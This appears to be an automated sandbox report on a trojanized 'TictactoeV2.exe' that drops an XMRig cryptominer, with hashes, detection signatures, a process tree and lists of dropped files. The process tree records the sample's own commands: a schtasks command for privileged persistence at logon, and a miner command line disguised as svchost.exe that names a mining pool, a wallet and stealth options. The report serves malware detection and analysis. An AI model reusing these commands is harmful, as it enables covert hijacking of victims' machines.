Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 08:22

General

  • Target

    TictactoeV2.exe

  • Size

    66.8MB

  • MD5

    6d15a52644466f720351b29f23a88c6c

  • SHA1

    ed7f88128f95b637a80f1da5bb5c922e9554957b

  • SHA256

    61acb0dbb2b06d20568b57fb53173757d70c7985d7cf90b0c4bcf2882ce6a8c6

  • SHA512

    71774e9beac7627b057de1dbd796fde127eb43fb6833e68beb3106dda561e007b2ed2018bd56c3099fe362c25d0677c33ace9af74b84d53d9d88c391f40e2a42

  • SSDEEP

    1572864:QTArWOmEB2NSV07v0eqbydQx89Eh3yxpPvcJZTEbc7M:QwvB2NZGapih3Ivc74c7

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 16 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 26 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of SetThreadContext 1 IoCs
  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TictactoeV2.exe
    "C:\Users\Admin\AppData\Local\Temp\TictactoeV2.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Users\Admin\AppData\Local\Temp\EDDEEDDE.EXE
      "C:\Users\Admin\AppData\Local\Temp\EDDEEDDE.EXE"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\EDDEEDDE.EXE"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1288
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2360
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Users\Admin\services64.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2356
          • C:\Users\Admin\services64.exe
            C:\Users\Admin\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:940
              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2444
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                    PID:2692
                • C:\Windows\System32\svchost.exe
                  C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.xmrfast.com:9000 --user=45Benp7oTJo3bUxokeDNtRdxhm8o5L9B5B6mWFXBFiJnEfddbg8LoaufdRGk2LRXwchCm3seCqwsfAyeB77f2przVDMYN3t --pass=xr miner --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2092
      • C:\Users\Admin\AppData\Local\Temp\STUB.EXE
        "C:\Users\Admin\AppData\Local\Temp\STUB.EXE"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Users\Admin\AppData\Local\Temp\STUB.EXE
          "C:\Users\Admin\AppData\Local\Temp\STUB.EXE"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2860
      • C:\Users\Admin\AppData\Local\Temp\TIC TAC TOE.EXE
        "C:\Users\Admin\AppData\Local\Temp\TIC TAC TOE.EXE"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2508
        • C:\Users\Admin\AppData\Local\Temp\TIC TAC TOE.EXE
          "C:\Users\Admin\AppData\Local\Temp\TIC TAC TOE.EXE"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1972

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\STUB.EXE

      Filesize

      10.2MB

      MD5

      97af7a82e4d2e078a95f6f8d2832f1b4

      SHA1

      d02457ee5205cd5974ba1143983877d9ea7465e9

      SHA256

      63aa419adeb4a806620f305ff2fb716a4dbced408b911e4d243b5e9c1526856d

      SHA512

      3eb61a5b69d2713d8989b68fae75b4fb08df70932512cf6288bfb5fe62778eeb586ee17f4a71c5f04380534a7d6fbf4bfa05ef530ef0f328d7ed5ef69990a3b2

    • C:\Users\Admin\AppData\Local\Temp\_MEI25082\python310.dll

      Filesize

      4.2MB

      MD5

      384349987b60775d6fc3a6d202c3e1bd

      SHA1

      701cb80c55f859ad4a31c53aa744a00d61e467e5

      SHA256

      f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

      SHA512

      6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

    • C:\Users\Admin\AppData\Local\Temp\_MEI27962\api-ms-win-core-file-l1-2-0.dll

      Filesize

      21KB

      MD5

      1c58526d681efe507deb8f1935c75487

      SHA1

      0e6d328faf3563f2aae029bc5f2272fb7a742672

      SHA256

      ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

      SHA512

      8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

    • C:\Users\Admin\AppData\Local\Temp\_MEI27962\api-ms-win-core-localization-l1-2-0.dll

      Filesize

      21KB

      MD5

      724223109e49cb01d61d63a8be926b8f

      SHA1

      072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

      SHA256

      4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

      SHA512

      19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

    • C:\Users\Admin\AppData\Local\Temp\_MEI27962\api-ms-win-core-timezone-l1-1-0.dll

      Filesize

      21KB

      MD5

      d12403ee11359259ba2b0706e5e5111c

      SHA1

      03cc7827a30fd1dee38665c0cc993b4b533ac138

      SHA256

      f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

      SHA512

      9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

    • C:\Users\Admin\AppData\Local\Temp\_MEI27962\python310.dll

      Filesize

      1.4MB

      MD5

      90d5b8ba675bbb23f01048712813c746

      SHA1

      f2906160f9fc2fa719fea7d37e145156742ea8a7

      SHA256

      3a7d497d779ff13082835834a1512b0c11185dd499ab86be830858e7f8aaeb3e

      SHA512

      872c2bf56c3fe180d9b4fb835a92e1dc188822e9d9183aab34b305408bb82fba1ead04711e8ad2bef1534e86cd49f2445d728851206d7899c1a7a83e5a62058e

    • C:\Users\Admin\AppData\Local\Temp\_MEI27962\ucrtbase.dll

      Filesize

      992KB

      MD5

      0e0bac3d1dcc1833eae4e3e4cf83c4ef

      SHA1

      4189f4459c54e69c6d3155a82524bda7549a75a6

      SHA256

      8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

      SHA512

      a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

    • \Users\Admin\AppData\Local\Temp\EDDEEDDE.EXE

      Filesize

      29.7MB

      MD5

      0057b15f3ecea7f9b2ecfe73e673395d

      SHA1

      9317aec18372c1bcef765366c4996c353664e69f

      SHA256

      b0b9e64c9c0bed10f1bbefe969ec42efff17371de8187b015553af95b923a8f5

      SHA512

      0978ecb87b3ca62e067f7c9a527256e02c38daeaa99f4ecde70b4d78094dff903ec535c64c777194b31b90e330e7ed9e72bb9f7c2bbf494a502a927075ebf697

    • \Users\Admin\AppData\Local\Temp\TIC TAC TOE.EXE

      Filesize

      26.8MB

      MD5

      7f2195fa2ff273a876cc1283c3925fb0

      SHA1

      8f4f5a08680e16babe78a2de08ce7bf3bdb5e13d

      SHA256

      f9d357cd159fc735af4fe88a8fc647e2f68b721496f0ec86a115265796e42f31

      SHA512

      b877ac516fa82867fcbf6d429b21dc69e4837153ce1f6e7532c7c7e764d7d1266a0355c182b3e0ab1057f5b90770bfb60aaa883c409dbcbcd0af1b6c7245a321

    • \Users\Admin\AppData\Local\Temp\_MEI27962\api-ms-win-core-file-l2-1-0.dll

      Filesize

      18KB

      MD5

      bfffa7117fd9b1622c66d949bac3f1d7

      SHA1

      402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

      SHA256

      1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

      SHA512

      b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

    • \Users\Admin\AppData\Local\Temp\_MEI27962\api-ms-win-core-processthreads-l1-1-1.dll

      Filesize

      21KB

      MD5

      517eb9e2cb671ae49f99173d7f7ce43f

      SHA1

      4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

      SHA256

      57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

      SHA512

      492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

    • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      bcc8388d6d4c5fc513dc4fcff577bb21

      SHA1

      be3519f359cc853a4474eb302ad29c92187b52d8

      SHA256

      762d50d2c0bf435d8f27b029733961e40b8a0d4ea8f267bbb6861c2b1744ccd3

      SHA512

      77866df5aa06b9dd79bf53c35872ca45496b786083162beabdf08231b41ea23acc715c2603a3ed7dfdf35dd002b4912d1d83e17e5f6a5f074809d0d5d8137abb

    • memory/840-253-0x00000000000B0000-0x0000000001E6E000-memory.dmp

      Filesize

      29.7MB

    • memory/840-256-0x00000000207D0000-0x000000002258E000-memory.dmp

      Filesize

      29.7MB

    • memory/2092-460-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-476-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-462-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-470-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-464-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-480-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-486-0x0000000000160000-0x0000000000180000-memory.dmp

      Filesize

      128KB

    • memory/2092-485-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-483-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-482-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

      Filesize

      4KB

    • memory/2092-478-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-458-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-474-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-472-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-468-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-490-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-491-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-489-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-488-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-487-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2092-466-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2692-492-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

    • memory/2692-493-0x0000000001CE0000-0x0000000001CE6000-memory.dmp

      Filesize

      24KB

    • memory/2860-118-0x000007FEF59C0000-0x000007FEF5E25000-memory.dmp

      Filesize

      4.4MB